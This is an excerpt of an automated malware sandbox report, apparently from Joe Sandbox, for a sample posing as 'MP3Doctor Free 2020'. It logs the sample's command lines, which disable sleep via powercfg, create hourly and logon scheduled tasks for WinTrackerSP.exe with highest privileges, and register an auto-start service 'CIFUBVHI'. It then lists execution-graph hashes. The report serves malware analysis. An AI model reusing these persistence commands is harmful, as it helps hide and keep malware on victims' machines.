Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 0000001F.00000000.2392814904.0000000000401000.00000020.00000001.01000000.0000001D.sdmp, Author: Joe Security Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\MP3Doctor Free 2020\mp3doctorfree32_64.exe, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	18:05:27
Start date:	01/07/2024
Path:	C:\Windows\System32\powercfg.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Imagebase:	0x7ff73bac0000
File size:	96'256 bytes
MD5 hash:	9CA38BE255FFF57A92BD6FBF8052B705
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	18:05:27
Start date:	01/07/2024
Path:	C:\Windows\System32\powercfg.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
Imagebase:	0x7ff73bac0000
File size:	96'256 bytes
MD5 hash:	9CA38BE255FFF57A92BD6FBF8052B705
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	18:05:27
Start date:	01/07/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	schtasks /create /f /RU "user" /tr "C:\ProgramData\WinTrackerSP\WinTrackerSP.exe" /tn "WinTrackerSP HR" /sc HOURLY /rl HIGHEST
Imagebase:	0xc00000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	18:05:27
Start date:	01/07/2024
Path:	C:\Windows\System32\powercfg.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
Imagebase:	0x7ff73bac0000
File size:	96'256 bytes
MD5 hash:	9CA38BE255FFF57A92BD6FBF8052B705
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	18:05:27
Start date:	01/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	18:05:27
Start date:	01/07/2024
Path:	C:\Windows\System32\powercfg.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
Imagebase:	0x7ff73bac0000
File size:	96'256 bytes
MD5 hash:	9CA38BE255FFF57A92BD6FBF8052B705
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	18:05:27
Start date:	01/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	18:05:27
Start date:	01/07/2024
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\sc.exe delete "CIFUBVHI"
Imagebase:	0x7ff6de140000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	18:05:27
Start date:	01/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	41
Start time:	18:05:27
Start date:	01/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	42
Start time:	18:05:27
Start date:	01/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	43
Start time:	18:05:27
Start date:	01/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	44
Start time:	18:05:27
Start date:	01/07/2024
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\sc.exe create "CIFUBVHI" binpath= "C:\ProgramData\lmguvcpihozg\eqtpkqwqodik.exe" start= "auto"
Imagebase:	0x7ff6de140000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	45
Start time:	18:05:27
Start date:	01/07/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	schtasks /create /f /RU "user" /tr "C:\ProgramData\WinTrackerSP\WinTrackerSP.exe" /tn "WinTrackerSP LG" /sc ONLOGON /rl HIGHEST
Imagebase:	0xc00000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	46
Start time:	18:05:27
Start date:	01/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	47
Start time:	18:05:27
Start date:	01/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	48
Start time:	18:05:28
Start date:	01/07/2024
Path:	C:\ProgramData\WinTrackerSP\WinTrackerSP.exe
Wow64 process (32bit):	true
Commandline:	C:\ProgramData\WinTrackerSP\WinTrackerSP.exe
Imagebase:	0x490000
File size:	3'828'752 bytes
MD5 hash:	2AB891D9C6B24C5462E32A0BAB3D1FEC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 62%, ReversingLabs
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	11.9%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	7.5%
Total number of Nodes:	764
Total number of Limit Nodes:	5

Executed Functions

Function 0067DAB0 Relevance: 27.1, APIs: 14, Strings: 1, Instructions: 893
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

recv.WS2_32(000001E4,00000000,00000004,00000002), ref: 0067DB32
WSAGetLastError.WS2_32 ref: 0067DB3B
recv.WS2_32(?,?,0000000C,00000002), ref: 0067E62C
recv.WS2_32(?,?,0000000C,00000008), ref: 0067E678

Strings

(, xrefs: 0067E87F

Memory Dump Source

Source File: 00000007.00000002.3350838650.0000000000671000.00000020.00000001.01000000.00000007.sdmp, Offset: 00670000, based on PE: true

Associated: 00000007.00000002.3350673698.0000000000670000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3351255834.00000000006DF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3351446597.00000000006E0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3351600300.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3351755588.00000000006F7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3351938672.00000000006FA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3351938672.000000000072F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354243463.0000000000758000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354480591.000000000075A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.000000000077A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A3A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A41000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A49000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A4D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A4F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A51000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A53000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A55000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A57000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A59000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A5B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A5D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A5F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A61000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A64000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A6A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A6E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A75000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A80000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A82000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A84000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A8C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A90000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A92000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000AF9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3368193614.0000000000CF2000.00000020.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_670000_IVTULQzdBmF3Bc0NeoxSnYvg.jbxd

Similarity

API ID: recv$ErrorLast
String ID: (
API String ID: 1980834949-3887548279
Opcode ID: 812a393d8604a192aca5a6959f1370a55145ab324e443e7733177ff932fcd0b8
Instruction ID: cdfa7bb62b98988e7b07ebdbb3259c539af3d5c5d0f1998544cf5e6db0d0d713
Opcode Fuzzy Hash: 812a393d8604a192aca5a6959f1370a55145ab324e443e7733177ff932fcd0b8
Instruction Fuzzy Hash: E99226B0D01218DFDB64DF68CC95BEEBBB2AB49300F1082D9E119A7291DB745E85CF94

Function 0067C650 Relevance: 10.6, APIs: 7, Instructions: 96
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSAStartup.WS2_32(00000202,?), ref: 0067C67A
WSACleanup.WS2_32 ref: 0067C6DF

Memory Dump Source

Source File: 00000007.00000002.3350838650.0000000000671000.00000020.00000001.01000000.00000007.sdmp, Offset: 00670000, based on PE: true

Associated: 00000007.00000002.3350673698.0000000000670000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3351255834.00000000006DF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3351446597.00000000006E0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3351600300.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3351755588.00000000006F7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3351938672.00000000006FA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3351938672.000000000072F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354243463.0000000000758000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354480591.000000000075A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.000000000077A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A3A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A41000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A49000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A4D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A4F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A51000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A53000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A55000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A57000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A59000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A5B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A5D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A5F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A61000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A64000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A6A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A6E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A75000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A80000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A82000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A84000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A8C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A90000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A92000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000AF9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3368193614.0000000000CF2000.00000020.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_670000_IVTULQzdBmF3Bc0NeoxSnYvg.jbxd

Similarity

API ID: CleanupStartup
String ID:
API String ID: 915672949-0
Opcode ID: 97345542d21d20fb288b3a50a3af70b8cddc69fed27718af3951ad8667e2047d
Instruction ID: fc501188cc306806444ac34efd9ac30ab542e455c2b30a955535b580412163b7
Opcode Fuzzy Hash: 97345542d21d20fb288b3a50a3af70b8cddc69fed27718af3951ad8667e2047d
Instruction Fuzzy Hash: 8441CB74D05209EFDB14CFA8D988AEDBBB5BB08324F20865EE526A73D0C7349A41DF54

Function 006B8034 Relevance: 1.7, APIs: 1, Instructions: 157
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000007.00000002.3350838650.0000000000671000.00000020.00000001.01000000.00000007.sdmp, Offset: 00670000, based on PE: true

Associated: 00000007.00000002.3350673698.0000000000670000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3351255834.00000000006DF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3351446597.00000000006E0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3351600300.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3351755588.00000000006F7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3351938672.00000000006FA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3351938672.000000000072F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354243463.0000000000758000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354480591.000000000075A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.000000000077A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A3A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A41000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A49000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A4D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A4F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A51000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A53000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A55000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A57000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A59000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A5B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A5D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A5F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A61000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A64000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A6A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A6E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A75000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A80000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A82000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A84000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A8C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A90000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A92000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000AF9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3368193614.0000000000CF2000.00000020.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_670000_IVTULQzdBmF3Bc0NeoxSnYvg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e337004dc919fe7d0462fd9e9974b00fb415562f0eecb573919fb3e127edf7a0
Instruction ID: 267a8554f884c394ea8ec95155657b7483596d8a35b2e077fadb7b0ba4e64782
Opcode Fuzzy Hash: e337004dc919fe7d0462fd9e9974b00fb415562f0eecb573919fb3e127edf7a0
Instruction Fuzzy Hash: 6A5193B0A00109AFDB14DF5CCC85AEA7BBBEF59354F248158F8495B352DB719E82CB90

Function 006996D0 Relevance: 1.5, APIs: 1, Instructions: 36
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Concurrency::cancel_current_task.LIBCPMTD ref: 006996E7

Memory Dump Source

Source File: 00000007.00000002.3350838650.0000000000671000.00000020.00000001.01000000.00000007.sdmp, Offset: 00670000, based on PE: true

Associated: 00000007.00000002.3350673698.0000000000670000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3351255834.00000000006DF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3351446597.00000000006E0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3351600300.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3351755588.00000000006F7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3351938672.00000000006FA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3351938672.000000000072F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354243463.0000000000758000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354480591.000000000075A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.000000000077A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A3A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A41000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A49000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A4D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A4F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A51000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A53000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A55000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A57000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A59000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A5B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A5D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A5F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A61000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A64000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A6A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A6E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A75000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A80000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A82000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A84000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A8C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A90000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A92000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000AF9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3368193614.0000000000CF2000.00000020.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_670000_IVTULQzdBmF3Bc0NeoxSnYvg.jbxd

Similarity

API ID: Concurrency::cancel_current_task
String ID:
API String ID: 118556049-0
Opcode ID: bac25b9cee57bc5157a7d0d9f1de2edb132cfa7269b5017296a497545b2e5f84
Instruction ID: a97303412a7619dfb691079ecdf035c3a87c6ef9457ab811753eba35d980ecf2
Opcode Fuzzy Hash: bac25b9cee57bc5157a7d0d9f1de2edb132cfa7269b5017296a497545b2e5f84
Instruction Fuzzy Hash: 8BF03174D0010CABCF04DFACD5816ADB7B6EF44308F1481AEE8059B745E6319E50DBA5

Function 006CADEC Relevance: 1.5, APIs: 1, Instructions: 32
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000000,006918B8), ref: 006CAE1E

Memory Dump Source

Source File: 00000007.00000002.3350838650.0000000000671000.00000020.00000001.01000000.00000007.sdmp, Offset: 00670000, based on PE: true

Associated: 00000007.00000002.3350673698.0000000000670000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3351255834.00000000006DF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3351446597.00000000006E0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3351600300.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3351755588.00000000006F7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3351938672.00000000006FA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3351938672.000000000072F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354243463.0000000000758000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354480591.000000000075A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.000000000077A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A3A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A41000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A49000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A4D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A4F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A51000.00000040.00000001.01000000.00000007.sdmpDownload File
